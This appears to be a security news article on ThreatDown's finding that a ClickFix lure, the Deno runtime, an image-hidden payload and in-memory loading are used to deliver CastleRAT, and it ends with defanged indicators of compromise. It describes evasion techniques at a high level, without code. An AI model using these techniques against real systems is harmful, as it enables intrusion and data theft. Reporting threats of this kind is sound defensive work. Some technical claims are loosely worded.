ThreatDown Research recently found the first documented use of the Deno JavaScript runtime in a CastleRAT attack, which is a big deal in the world of cybersecurity. This advanced attack chain gets around standard security measures, which is a big step forward for cybercriminals. The campaign uses Deno, a well-known and trusted runtime environment, in a way that is unique to run CastleRAT, a powerful tool for spying and stealing data.
This attack shows how creative and sneaky modern malware campaigns have become, with attackers doing everything they can to avoid being caught. The "ClickFix" social engineering trap and Deno exploitation: The attack starts with a simple but effective social engineering trick called ClickFix, which tricks the victim into pasting a command into the Windows terminal to "fix" a browser error or CAPTCHA.
The attackers make the user run a command that silently downloads the malicious installer by getting around standard web security measures. This method cleverly takes advantage of human error, which makes it harder to stop and more likely to work. What CastleRAT Does Deno Evasion (Source: threatdown) Once the attacker gets into the system, they don't use malware right away.
Instead, they install Deno, which is a trusted and legitimate runtime. Antivirus software usually doesn't flag Deno's installation because its digital signature tells it not to. How CastleRAT Works Deno Evasion (Source: threatdown) This sets up the next step: the attackers use Deno as a Trojan horse to run JavaScript that is hard to read. Because Deno is a trusted process, the malware runs with higher privileges, which makes it hard for traditional detection systems to find it.
Stealthy Execution and Delivery of CastleRAT Payload Once the Deno runtime is set up, the attackers hide what they're doing even more. Deno runs JavaScript code that downloads a Python environment that is cleverly disguised as Petuhon and a JPEG image (CFBAT.jpg). The picture looks safe, but it has an encrypted CastleRAT payload in it.
Using a method called reflective PE loading, the Python script, which is protected by PyArmor, decodes the payload directly into memory. This means that the malware never touches the disk. CastleRAT Uses Deno Evasion (Source: threatdown) This method hides from file-scanning antivirus engines, which means that most security tools won't be able to see it. It sends this information to a server that controls everything (C2).
The malware also uses low-level Windows APIs to steal data, log keystrokes, and take over the clipboard. It goes after sensitive information like cryptocurrency wallet files, browsing history, and developer credentials. Threatdown's research shows that companies need to use behavioral monitoring and endpoint detection and response (EDR) tools to protect themselves from these kinds of threats.
Type of indicator: C2 Domain dsennbuappec[.]zhivachkapro[. ]com C2 Domain serialmenot[. ]com IP Address: 172.86.123.222 SHA256 Hash aae017e7a36e016655c91bd01b4f3c46309bbe540733f82cce29392e72e9bd1f for IP Address 23[. ]94.145.120 Hash a4787a42070994b7f1222025828faf9b153710bb730e58da710728e148282e28 Clickzpaqkvba.msi is an associated file, and november_block25.vbs is an associated file.
This new kind of attack shows how important it is to change security strategies so that they go beyond traditional methods and focus on finding and stopping suspicious behavior instead of just relying on static defenses.
